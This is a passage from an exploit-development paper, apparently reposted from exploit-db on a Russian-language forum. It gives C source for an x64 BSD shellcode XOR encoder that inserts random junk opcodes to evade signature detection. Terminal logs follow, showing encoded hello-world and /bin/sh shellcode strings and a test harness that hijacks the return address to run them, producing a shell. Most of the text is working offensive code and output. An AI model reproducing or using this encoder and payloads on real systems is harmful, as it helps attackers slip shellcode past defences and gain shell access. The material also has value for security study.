 "\xe8\xe1\xff\xff\xff"; /* callq  4000b8 <jmp_back>     */

unsigned char useless[][5] = {
 {"\x90"},              /* nop              */
 {"\x4d\x31\xd2"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xdb"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xe4"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xed"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xf6"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xff"},      /* xor    %r10,%r10 */
 {"\x49\xc1\xea\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe2\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xeb\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe3\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xec\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe4\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xed\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe5\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xee\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe6\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xef\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe7\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xff\xc2"},      /* inc    %r10      */
 {"\x49\xff\xca"},      /* dec    %r10      */
 {"\x49\xff\xc3"},      /* inc    %r10      */
 {"\x49\xff\xcb"},      /* dec    %r10      */
 {"\x49\xff\xc4"},      /* inc    %r10      */
 {"\x49\xff\xcc"},      /* dec    %r10      */
 {"\x49\xff\xc5"},      /* inc    %r10      */
 {"\x49\xff\xcd"},      /* dec    %r10      */
 {"\x49\xff\xc6"},      /* inc    %r10      */
 {"\x49\xff\xce"},      /* dec    %r10      */ 
 {"\x49\xff\xc7"},      /* inc    %r10      */
 {"\x49\xff\xcf"}};     /* dec    %r10      */

void
usage(void) {
    printf("/n/************************************************/\n");
    printf("/*                                              */\n");
    printf("/* entropy [at] phiral.net                      */\n");
    printf("/* simple x64 bsd xor encoder and obfuscator    */\n");
    printf("/*                                              */\n");
    printf("/************************************************/\n\n");    

    return;
}

int 
main(int argc, char **argv) {

    struct stat sstat;
    int i, n, fd, len, xor_with;
    int dlen, plen, olen;
    unsigned char *fbuf, *ebuf;
    unsigned char bad_bytes[256] = {0};
    unsigned char good_bytes[256] = {0};

    /* open the sc.bin file and read all the bytes */
    if (lstat("sc.bin", &sstat) < 0) {
        usage();        
        _exit(-1);
    }

    len = sstat.st_size;
    if ((fbuf = (unsigned char *)malloc(len)) == NULL) {
        perror("malloc");
        _exit(-1);
    }
    
    if ((fd = open("sc.bin", O_RDONLY)) < 0) {
        perror("open");
        _exit(-1);
    }

    if (read(fd, fbuf, len) != len) {
        perror("read");
        _exit(-1);
    }

    close(fd);

    /* try every byte xored, if its \x0 add to bad_bytes */
    for (n = 0; n < len; n++) {
        for (i = 1; i < 256; i++) {
             if ((i^*(fbuf+n)) == 0) bad_bytes[i] = i;
        }
    }  

    /* if its not a bad_byte its a good_one (ordered) */
    for (i = 1, n = 0; i < 256; i++) {
        if (bad_bytes[i] == '\0') good_bytes[n++] = i;
    }
    
    srand((unsigned)time(NULL));  
    xor_with = good_bytes[rand()%n];

    if (xor_with) {
        printf("\n[x] Choose to XOR with 0x%02x\n\n", xor_with);
        srand((unsigned)time(NULL));
        xor_with = good_bytes[rand()%n];

        /* overwrite that 5th xor byte with the xor_with byte */
        decoder[5] = xor_with;
        dlen = strlen((char *)decoder);

        /* prepend: longest useless[] instruction were using is four bytes
         * randomly prepend between one and four useless instructions so
         * sixteen bytes at maximim. 
         */
        /* insert: we can only insert two instructions in between the
         * decoder instructions before the jmp, they are also max of
         * four bytes so we allocate another eight.
         */
        if ((ebuf = (unsigned char *)malloc(16+8+dlen+len+1)) == NULL) {
            perror("malloc");
            _exit(-1);
        }
        memset(ebuf, '\x0', sizeof(ebuf));

        /* randomly prepend between one and four instructions */
        /* thirty one lines of useless[] instructions in 2d array */
        n = rand()%(4 + 1);
        for (i = 0, plen = 0; i < n; i++) {
            int k, opcode = rand()%31;
            printf("[p] Prepending useless opcodes: ");
            for (k = 0; k < strlen((char *)useless[opcode]); k++) {
                printf("\\x%02x", useless[opcode][k]);
            }
            printf("\n");
            memcpy(ebuf+plen, useless[opcode], strlen((char *)useless[opcode]));
            plen += strlen((char *)useless[opcode]);
        }
        printf("\n");

        /* only place to insert unless[] instructions is at the offsets
         * two and five
         */
        for (i = 0, olen = 0; i < dlen; i++) {
             ebuf[(i+plen+olen)] = decoder[i];             
             if (i == 2 || i == 5) {
                 int k, opcode = rand()%31;                 
                 printf("[i] Inserting useless opcodes: ");
                 for (k = 0; k < strlen((char *)useless[opcode]); k++) {      
                     printf("\\x%02x", useless[opcode][k]);
                 }
                 printf("\n");
                 memcpy(ebuf+(i+plen+olen)+1, useless[opcode], strlen((char *)useless[opcode]));
                 olen += strlen((char *)useless[opcode]);
             }  
        } 

        /* copy the xored shellcode byes in */
        for (i = 0; i < len; i++) {
            ebuf[(i+dlen+plen+olen)] = xor_with^*(fbuf+i);
        }

        printf("\n\"");
        for (i = 0; i < strlen((char *)ebuf); i++) {
            if (i > 0 && i % 15 == 0) printf("\"\n\""); 
            printf("\\x%02x", ebuf[i]);
        }
        printf("\";\n\n");

        return 0;
    } else {
        printf("\n[*] No byte found to XOR with :(\n");
        _exit(-1);
    }

    return 0;
}

[[email protected] ~/code/encoder/fids/fini/1]$ gcc -Wall encoder.c -o encoder
[[email protected] ~/code/encoder/fids/fini/1]$ as hello_world.s -o hello_world.o
[[email protected] ~/code/encoder/fids/fini/1]$ ld hello_world.o -o hello_world
[[email protected] ~/code/encoder/fids/fini/1]$ ./write-sc.sh hello_world
[[email protected] ~/code/encoder/fids/fini/1]$ ./encoder 

[x] Choose to XOR with 0xc8

[p] Prepending useless opcodes: \x49\xff\xcc
[p] Prepending useless opcodes: \x49\xff\xce
[p] Prepending useless opcodes: \x49\xff\xc5

[i] Inserting useless opcodes: \x49\xff\xcc
[i] Inserting useless opcodes: \x49\xc1\xe6\x08

"\x49\xff\xcc\x49\xff\xce\x49\xff\xc5\x4d\x31\xc0\x49\xff\xcc"
"\x41\xb1\xc8\x49\xc1\xe6\x08\xeb\x1a\x58\x48\x31\xc9\x48\x31"
"\xdb\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08"
"\x48\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x58\xa2\xcc\x90\xa2"
"\xc9\x97\x80\x71\xa7\xba\xa4\xac\xe9\xc2\x62\x62\x99\x80\x71"
"\x80\xad\xa4\xa4\xa7\xe4\xe8\x9f\x99\x80\xf9\x13\x80\xf9\x01"
"\x71\xc6\xc8\xc8\xc8\xae\x41\xd4\xc4\x80\x41\x2e\xa2\xc6\x92"
"\x05\x48\x91\x91\xa2\xc9\x90\xa2\xc8\x97\x05\x48";

[[email protected] ~/code/encoder/fids/fini/1]$ ./encoder 

[x] Choose to XOR with 0x26

[p] Prepending useless opcodes: \x49\xc1\xea\x08
[p] Prepending useless opcodes: \x49\xc1\xec\x08

[i] Inserting useless opcodes: \x49\xff\xc4
[i] Inserting useless opcodes: \x49\xff\xca

"\x49\xc1\xea\x08\x49\xc1\xec\x08\x4d\x31\xc0\x49\xff\xc4\x41"
"\xb1\x26\x49\xff\xca\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb\x8a"
"\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48\xff"
"\xc1\xeb\xed\xe8\xe1\xff\xff\xff\xb6\x4c\x22\x7e\x4c\x27\x79"
"\x6e\x9f\x49\x54\x4a\x42\x07\x2c\x8c\x8c\x77\x6e\x9f\x6e\x43"
"\x4a\x4a\x49\x0a\x06\x71\x77\x6e\x17\xfd\x6e\x17\xef\x9f\x28"
"\x26\x26\x26\x40\xaf\x3a\x2a\x6e\xaf\xc0\x4c\x28\x7c\xeb\xa6"
"\x7f\x7f\x4c\x27\x7e\x4c\x26\x79\xeb\xa6";

[[email protected] ~/code/encoder/fids/fini/1]$ cat sc.c
unsigned char sc[] = 
"\x49\xc1\xea\x08\x49\xc1\xec\x08\x4d\x31\xc0\x49\xff\xc4\x41"
"\xb1\x26\x49\xff\xca\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb\x8a"
"\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48\xff"
"\xc1\xeb\xed\xe8\xe1\xff\xff\xff\xb6\x4c\x22\x7e\x4c\x27\x79"
"\x6e\x9f\x49\x54\x4a\x42\x07\x2c\x8c\x8c\x77\x6e\x9f\x6e\x43"
"\x4a\x4a\x49\x0a\x06\x71\x77\x6e\x17\xfd\x6e\x17\xef\x9f\x28"
"\x26\x26\x26\x40\xaf\x3a\x2a\x6e\xaf\xc0\x4c\x28\x7c\xeb\xa6"
"\x7f\x7f\x4c\x27\x7e\x4c\x26\x79\xeb\xa6";

void main(void) {
   int *ret;
   ret = (int *)&ret + 4;
   (*ret) = (int)sc;

}

[[email protected] ~/code/encoder/fids/fini/1]$ gcc sc.c -o sc
sc.c: In function 'main':
sc.c:14: warning: cast from pointer to integer of different size
sc.c:11: warning: return type of 'main' is not 'int'
[[email protected] ~/code/encoder/fids/fini/1]$ ./sc
Hello, World!

[[email protected] ~/code/encoder/fids/fini/1]$ as shell.s -o shell.o 
[[email protected] ~/code/encoder/fids/fini/1]$ ld shell.o -o shell 
[[email protected] ~/code/encoder/fids/fini/1]$ ./write-sc.sh shell
[[email protected] ~/code/encoder/fids/fini/1]$ ./encoder 

[x] Choose to XOR with 0x43


[i] Inserting useless opcodes: \x49\xc1\xe4\x08
[i] Inserting useless opcodes: \x49\xff\xcb

"\x4d\x31\xc0\x49\xc1\xe4\x08\x41\xb1\x43\x49\xff\xcb\xeb\x1a"
"\x58\x48\x31\xc9\x48\x31\xdb\x8a\x1c\x08\x4c\x39\xc3\x74\x10"
"\x44\x30\xcb\x88\x1c\x08\x48\xff\xc1\xeb\xed\xe8\xe1\xff\xff"
"\xff\x29\x3d\x1b\x0b\x72\xbc\x0b\x72\xb5\x8e\xc3\x29\x78\x1b"
"\x0b\x72\x8a\x12\x0b\xca\xa5\x0b\xfa\x6c\x21\x2a\x2d\x6c\x30"
"\x2b\xe9\x12\x0b\xca\xa4\x0b\x72\x98\x0b\x72\x8a\xf2\x44\xcb"
"\x5f\x4f\x0b\x72\x91\x8e\xc3";

[[email protected] ~/code/encoder/fids/fini/1]$ cat sc.c
unsigned char sc[] = 
"\x4d\x31\xc0\x49\xc1\xe4\x08\x41\xb1\x43\x49\xff\xcb\xeb\x1a"
"\x58\x48\x31\xc9\x48\x31\xdb\x8a\x1c\x08\x4c\x39\xc3\x74\x10"
"\x44\x30\xcb\x88\x1c\x08\x48\xff\xc1\xeb\xed\xe8\xe1\xff\xff"
"\xff\x29\x3d\x1b\x0b\x72\xbc\x0b\x72\xb5\x8e\xc3\x29\x78\x1b"
"\x0b\x72\x8a\x12\x0b\xca\xa5\x0b\xfa\x6c\x21\x2a\x2d\x6c\x30"
"\x2b\xe9\x12\x0b\xca\xa4\x0b\x72\x98\x0b\x72\x8a\xf2\x44\xcb"
"\x5f\x4f\x0b\x72\x91\x8e\xc3";

void main(void) {
   int *ret;
   ret = (int *)&ret + 4;
   (*ret) = (int)sc;

}

[[email protected] ~/code/encoder/fids/fini/1]$ gcc sc.c -o sc
sc.c: In function 'main':
sc.c:13: warning: cast from pointer to integer of different size
sc.c:10: warning: return type of 'main' is not 'int'
[[email protected] ~/code/encoder/fids/fini/1]$ ./sc
$ exit

[[email protected] ~/code/encoder/fids/fini/1]$ ./encoder 

[x] Choose to XOR with 0x22

[p] Prepending useless opcodes: \x49\xc1\xe5\x08
[p] Prepending useless opcodes: \x49\xff\xcb
[p] Prepending useless opcodes: \x49\xc1\xe5\x08
[p] Prepending useless opcodes: \x49\xff\xcc

[i] Inserting useless opcodes: \x49\xc1\xec\x08
[i] Inserting useless opcodes: \x90

"\x49\xc1\xe5\x08\x49\xff\xcb\x49\xc1\xe5\x08\x49\xff\xcc\x4d"
"\x31\xc0\x49\xc1\xec\x08\x41\xb1\x22\x90\xeb\x1a\x58\x48\x31"
"\xc9\x48\x31\xdb\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb"
"\x88\x1c\x08\x48\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x48\x5c"
"\x7a\x6a\x13\xdd\x6a\x13\xd4\xef\xa2\x48\x19\x7a\x6a\x13\xeb"
"\x73\x6a\xab\xc4\x6a\x9b\x0d\x40\x4b\x4c\x0d\x51\x4a\x88\x73"
"\x6a\xab\xc5\x6a\x13\xf9\x6a\x13\xeb\x93\x25\xaa\x3e\x2e\x6a"
"\x13\xf0\xef\xa2";

[[email protected] ~/code/encoder/fids/fini/1]$ cat sc.c
unsigned char sc[] = 
"\x49\xc1\xe5\x08\x49\xff\xcb\x49\xc1\xe5\x08\x49\xff\xcc\x4d"
"\x31\xc0\x49\xc1\xec\x08\x41\xb1\x22\x90\xeb\x1a\x58\x48\x31"
"\xc9\x48\x31\xdb\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb"
"\x88\x1c\x08\x48\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x48\x5c"
"\x7a\x6a\x13\xdd\x6a\x13\xd4\xef\xa2\x48\x19\x7a\x6a\x13\xeb"
"\x73\x6a\xab\xc4\x6a\x9b\x0d\x40\x4b\x4c\x0d\x51\x4a\x88\x73"
"\x6a\xab\xc5\x6a\x13\xf9\x6a\x13\xeb\x93\x25\xaa\x3e\x2e\x6a"
"\x13\xf0\xef\xa2";

void main(void) {
   int *ret;
   ret = (int *)&ret + 4;
   (*ret) = (int)sc;

}

[[email protected] ~/code/encoder/fids/fini/1]$ gcc sc.c -o sc
sc.c: In function 'main':
sc.c:14: warning: cast from pointer to integer of different size
sc.c:11: warning: return type of 'main' is not 'int'
[[email protected] ~/code/encoder/fids/fini/1]$ ./sc
$ exit
 
Источник
www.exploit-db.com

Похожие темы